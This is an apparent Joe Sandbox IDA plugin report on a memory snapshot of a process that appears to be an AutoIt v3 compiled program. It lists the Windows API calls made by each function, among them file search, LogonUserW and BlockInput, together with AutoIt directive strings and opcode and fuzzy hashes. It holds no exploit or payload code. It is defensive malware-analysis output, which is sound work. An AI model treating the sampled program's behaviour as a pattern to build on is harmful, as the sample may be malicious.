                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 92bc94a96292cfcabd1d0ed0a37f7e0e80fc022afa8dc8820841825def0359945114e2a4cdba1f0312b27aa1b0e695cc0112e585ba133b81cbde9596d767d6a66e$ERCP$VUUU$VUUU$VUUU
                                                                            • API String ID: 0-2173910491
                                                                            • Opcode ID: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
                                                                            • Instruction ID: 514654dd073cfe12bfc68f6c44a091d7a3824994b709b832431b3f3de6bbd106
                                                                            • Opcode Fuzzy Hash: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
                                                                            • Instruction Fuzzy Hash: 5562D3716087818BE734CF18C8807ABB7E1EBC6314F154A2FE49986390E779D949CB5B
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045C9BE
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0045CA1B
                                                                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CA4A
                                                                            Similarity
                                                                            • API ID: Find$File$CloseFirstNext
                                                                            • String ID:
                                                                            • API String ID: 3541575487-0
                                                                            • Opcode ID: 436276e02b07ab2fc2fbb9ef65feb62f59ffdb7e44ebd27f42a301b2cca85d53
                                                                            • Instruction ID: 18858b47483a38653cd59612877c1399ad483e9f26b014a4aa46912757e3bc7b
                                                                            • Opcode Fuzzy Hash: 436276e02b07ab2fc2fbb9ef65feb62f59ffdb7e44ebd27f42a301b2cca85d53
                                                                            • Instruction Fuzzy Hash: EC41CE756003009FC720EF79D880A9BB3E4FF89315F208A6EED698B391D775A844CB95
                                                                            APIs
                                                                            • GetFileAttributesW.KERNEL32(00000001,00000000), ref: 00436AEF
                                                                            • FindFirstFileW.KERNEL32(00000001,?), ref: 00436B00
                                                                            • FindClose.KERNEL32(00000000), ref: 00436B13
                                                                            Similarity
                                                                            • API ID: FileFind$AttributesCloseFirst
                                                                            • String ID:
                                                                            • API String ID: 48322524-0
                                                                            • Opcode ID: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                            • Instruction ID: 417b6d6de692ea6945bae3bf725251b28653fd5bce93257cef0f58e2a105c1b1
                                                                            • Opcode Fuzzy Hash: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                            • Instruction Fuzzy Hash: 23E02236804418678600AB7CAC0C4EE779CDB0A335F100B96FE38C21D0D775A9408FEA
                                                                            APIs
                                                                            • __time64.LIBCMT ref: 004433A2
                                                                              • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                              • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                            Similarity
                                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                                            • String ID: rJ
                                                                            • API String ID: 2893107130-1865492326
                                                                            • Opcode ID: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                            • Instruction ID: ebc1a5536eae3429eadb0b33e849de59894c076497330b79c1ff8485d89898ec
                                                                            • Opcode Fuzzy Hash: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                            • Instruction Fuzzy Hash: B721A2336205108BF321CF36CC41652B7E7EBE0314F268A6AE4A5973C5CA797906CB98
                                                                            APIs
                                                                            • __time64.LIBCMT ref: 004433A2
                                                                              • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                              • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                            Similarity
                                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                                            • String ID: rJ
                                                                            • API String ID: 2893107130-1865492326
                                                                            • Opcode ID: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                            • Instruction ID: 4b4e0c3debee0a45c2bc781276f994e79ac96c452fb6cf924f1e6ade5adf298d
                                                                            • Opcode Fuzzy Hash: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                            • Instruction Fuzzy Hash: E82187336345108BF321CF36CC4165277E3EBE0314B258B6AD4A5973C5CA797906CB88
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045DDA1
                                                                            • FindClose.KERNEL32(00000000), ref: 0045DDDD
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst
                                                                            • String ID:
                                                                            • API String ID: 2295610775-0
                                                                            • Opcode ID: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                            • Instruction ID: 3577cc1601137e614a3334ffa73c6d258275d41fe8d72aaca367a27ef3e2a016
                                                                            • Opcode Fuzzy Hash: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                            • Instruction Fuzzy Hash: DE11E5766002049FD710EF6ADC89A5AF7E5EF84325F10892EF958D7281CB75E8048B94
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0vH$HH
                                                                            • API String ID: 0-728391547
                                                                            • Opcode ID: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                            • Instruction ID: 538a6706abcc28c04bdc151be30d2aa4e2083a8dfdfa6c30a7857f36827e6882
                                                                            • Opcode Fuzzy Hash: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                            • Instruction Fuzzy Hash: 60E1BE725143109FC310EF25C881A9FB7E5AFC4708F108D2EF589AB281D779E946CB9A
                                                                            Similarity
                                                                            • API ID: _memset
                                                                            • String ID:
                                                                            • API String ID: 2102423945-0
                                                                            • Opcode ID: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                            • Instruction ID: fac722ae1e10b3ad9494cda40f9fb3e9e62b3c26aea04ddfc6562ea9d2065ebb
                                                                            • Opcode Fuzzy Hash: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                            • Instruction Fuzzy Hash: C512B4B7B983194FDB48DEE4DCC169573E1FB98304F09A43C9A15C7306F6E8AA094794
                                                                            APIs
                                                                            • DefDlgProcW.USER32(?,?,?,?,004A83D8,?), ref: 0047E22C
                                                                            Similarity
                                                                            • API ID: Proc
                                                                            • String ID:
                                                                            • API String ID: 2346855178-0
                                                                            • Opcode ID: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                            • Instruction ID: e1c03c818efbd3cbf3664a0c3e659178dbc9a05004c0f073233894ce1d713c90
                                                                            • Opcode Fuzzy Hash: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                            • Instruction Fuzzy Hash: 4EB1E63330602429E114916BBC88EBFBB9CD7D677BB208B7FF142C1582DB5B6425A179
                                                                            Similarity
                                                                            • API ID: BlockInput
                                                                            • String ID:
                                                                            • API String ID: 3456056419-0
                                                                            • Opcode ID: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                            • Instruction ID: 5d782454ef4d0180448527013755d2523f66e5fc327f68786c1d80a86620ac83
                                                                            • Opcode Fuzzy Hash: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                            • Instruction Fuzzy Hash: D2E04F752043019BC700EF71C545A5BB7E4AF94314F108C6EF845A7351D775AC45CB66
                                                                            APIs
                                                                            • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 0043918E
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: LogonUser
                                                                            • String ID:
                                                                            • API String ID: 1244722697-0
                                                                            • Opcode ID: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                            • Instruction ID: 63114e5cfb2c4979e73f5d19eacf740c811f86df1a08bc2cb556a5e36cce81ff
                                                                            • Opcode Fuzzy Hash: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                            • Instruction Fuzzy Hash: 8DD0ECB52686066FD204CB24D846E2B77E9A7C4701F008A0CB196D2280C670D805CA32
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: NameUser
                                                                            • String ID:
                                                                            • API String ID: 2645101109-0
                                                                            • Opcode ID: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                            • Instruction ID: 8011c19b6c32d183c263453b2018abc548473ce9ed5616c99acac4896e71f792
                                                                            • Opcode Fuzzy Hash: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                            • Instruction Fuzzy Hash: F6E08C322083058FC310EF55F8405ABB390EB94311F004C3FE64AA2191DA79920EDFAB
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32 ref: 00422033
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            • Opcode ID: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                            • Instruction ID: 3275b40964251646410af8875a24301f93fa315c26af6adae0ca3d0f7a721f84
                                                                            • Opcode Fuzzy Hash: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                            • Instruction Fuzzy Hash: CD9002743511144A4A011BB16E5D90925D46A586067920875B411C4064DB9840019619
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                            • Instruction ID: b3f199f19983f506b623bfe7955a95149e6efe4e98ce3416cc40fa12ddcf4508
                                                                            • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                            • Instruction Fuzzy Hash: 46D19073C0A9B30A8735812D42582BFEE626FD578131EC3E29CD07F38AD26B5DA195D4
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                            • Instruction ID: c47bdb3f9c9e38c5d46ddb9e43dedaf70276048770aeb58bd274f21c588a824b
                                                                            • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                            • Instruction Fuzzy Hash: 1CD19073D1A9B30A8735852D42581AFEE626FD578031EC3E2CCD07F38AD16B5DA191D4
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                            • Instruction ID: ac15b8da1a4b082d71a0b082c8349c97121379a14580263daf363e6ab8f75410
                                                                            • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                            • Instruction Fuzzy Hash: 87C18173C0A9B30A8736812D42641AFEE626FD579031FC3E2CCD47F38A91AB5DA195D4
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                            • Instruction ID: aa957cafbedeae1199dea6a597ba911d219650f283d164fb65797e90308ef47b
                                                                            • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                            • Instruction Fuzzy Hash: 5FC18E73D0A9B30A8735812D42581AFEE626FD578031EC3E28CE46F38ED26F5DA195D4
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dc161bfdc883d32f341db1e4eb054b8efbcdca7b353545205808113d9fe9948c
                                                                            • Instruction ID: ec7c59e3bdc82c80c290d746f05686fd589804af8b2464336537e2c1352b8ccd
                                                                            • Opcode Fuzzy Hash: dc161bfdc883d32f341db1e4eb054b8efbcdca7b353545205808113d9fe9948c
                                                                            • Instruction Fuzzy Hash: F741456544E7D04FCB138BB888B9AA27FB0AE07214B5F44DBC5C5CF4B3D658994AC722
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                            • Instruction ID: b8cfd58d412160527e66ace840abba843d94ac3f5b06779728c9fe736b8606cc
                                                                            • Opcode Fuzzy Hash: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                            • Instruction Fuzzy Hash: ECD012F621844146F33144D866C0BD100437344310FB58C276005CEBC1C0DDECD6C229
                                                                            APIs
                                                                            • DeleteObject.GDI32(?), ref: 004593D7
                                                                            • DeleteObject.GDI32(?), ref: 004593F1
                                                                            • DestroyWindow.USER32 ref: 00459407
                                                                            • GetDesktopWindow.USER32 ref: 0045942A
                                                                            • GetWindowRect.USER32(00000000), ref: 00459431
                                                                            • SetRect.USER32 ref: 00459568
                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00459577
                                                                            • CreateWindowExW.USER32 ref: 004595BB
                                                                            • GetClientRect.USER32(00000000,?,?,50000001,?,?,00000000,00000000,00000000), ref: 004595C8
                                                                            • CreateWindowExW.USER32 ref: 00459615
                                                                            • CreateFileW.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000), ref: 00459635
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459654
                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 0045965F
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00459668
                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00459678
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0045967F
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00459686
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00459694
                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,000001F4), ref: 004596AD
                                                                            • GlobalFree.KERNEL32(00000000), ref: 004596C0
                                                                            • CopyImage.USER32 ref: 004596EF
                                                                            • SendMessageW.USER32(00000000,00000172,00000000,000000FF), ref: 00459712
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 0045973D
                                                                            • ShowWindow.USER32(?,00000004), ref: 0045974B
                                                                            • CreateWindowExW.USER32 ref: 0045979C
                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004597AD
                                                                            • GetStockObject.GDI32(00000011), ref: 004597B7
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004597BF
                                                                            • GetTextFaceW.GDI32(00000000,00000040,00000190), ref: 004597CD
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A,?,50000001,?,?,00000000,00000000,00000000), ref: 004597D6
                                                                            • DeleteDC.GDI32(00000000), ref: 004597E1
                                                                            • _wcslen.LIBCMT ref: 00459800
                                                                            • _wcscpy.LIBCMT ref: 0045981F
                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 004598BB
                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004598D0
                                                                            • GetDC.USER32(?), ref: 004598DE
                                                                            • SelectObject.GDI32(00000000,?), ref: 004598EE
                                                                            • SelectObject.GDI32(00000000,?), ref: 00459919
                                                                            • ReleaseDC.USER32(?,00000000), ref: 00459925
                                                                            • MoveWindow.USER32(?,0000000B,?,?,?,00000001), ref: 00459943
                                                                            • ShowWindow.USER32(?,00000004), ref: 00459951
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                            • API String ID: 4040870279-2373415609
                                                                            • Opcode ID: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                            • Instruction ID: fce7466cc8f2b4b34a2e278d60cb4f704f90ff1017bfb666dbfc83d8aba9d67a
                                                                            • Opcode Fuzzy Hash: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                            • Instruction Fuzzy Hash: 3F028C70204301EFD714DF64DE89F2BB7A8AB84705F104A2DFA45AB2D2D7B4E805CB69
                                                                            APIs
                                                                            • GetSysColor.USER32(00000012), ref: 00441E64
                                                                            • SetTextColor.GDI32(?,?), ref: 00441E6C
                                                                            • GetSysColorBrush.USER32 ref: 00441E83
                                                                            • GetSysColor.USER32(0000000F), ref: 00441E8F
                                                                            • SetBkColor.GDI32(?,?), ref: 00441EAA
                                                                            • SelectObject.GDI32(?,?), ref: 00441EBA
                                                                            • InflateRect.USER32 ref: 00441EF0
                                                                            • GetSysColor.USER32(00000010), ref: 00441EF8
                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00441EFF
                                                                            • FrameRect.USER32 ref: 00441F10
                                                                            • DeleteObject.GDI32(?), ref: 00441F1B
                                                                            • InflateRect.USER32 ref: 00441F75
                                                                            • FillRect.USER32 ref: 00441FB6
                                                                              • Part of subcall function 00433D5C: GetSysColor.USER32(0000000E,?,?,?,?,?,?,?,?,?,?,?,?,?,00441E27,?), ref: 00433D81
                                                                              • Part of subcall function 00433D5C: SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                                              • Part of subcall function 00433D5C: GetSysColorBrush.USER32 ref: 00433DBF
                                                                              • Part of subcall function 00433D5C: GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,?,?,?,?,?,?,00441E27,?), ref: 00433DCB
                                                                              • Part of subcall function 00433D5C: GetSysColor.USER32(00000011,?,?,?,?,?,?,?,?,?,?,?,?,?,00441E27,?), ref: 00433DEB
                                                                              • Part of subcall function 00433D5C: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                                              • Part of subcall function 00433D5C: SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                                              • Part of subcall function 00433D5C: SetBkColor.GDI32(?,?), ref: 00433E19
                                                                              • Part of subcall function 00433D5C: SelectObject.GDI32(?,?), ref: 00433E29
                                                                              • Part of subcall function 00433D5C: InflateRect.USER32 ref: 00433E54
                                                                              • Part of subcall function 00433D5C: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                                              • Part of subcall function 00433D5C: GetWindowLongW.USER32 ref: 00433E8A
                                                                              • Part of subcall function 00433D5C: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                            • String ID:
                                                                            • API String ID: 69173610-0
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsnicmp
                                                                            • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                            • API String ID: 1038674560-3360698832
                                                                            APIs
                                                                            • GetSysColor.USER32(0000000E,?,?,?,?,?,?,?,?,?,?,?,?,?,00441E27,?), ref: 00433D81
                                                                            • SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                                            • GetSysColor.USER32(00000012,?,?,?,?,?,?,?,?,?,?,?,?,?,00441E27,?), ref: 00433DA3
                                                                            • SetTextColor.GDI32(?,?), ref: 00433DAB
                                                                            • GetSysColorBrush.USER32 ref: 00433DBF
                                                                            • GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,?,?,?,?,?,?,00441E27,?), ref: 00433DCB
                                                                            • CreateSolidBrush.GDI32(?), ref: 00433DD4
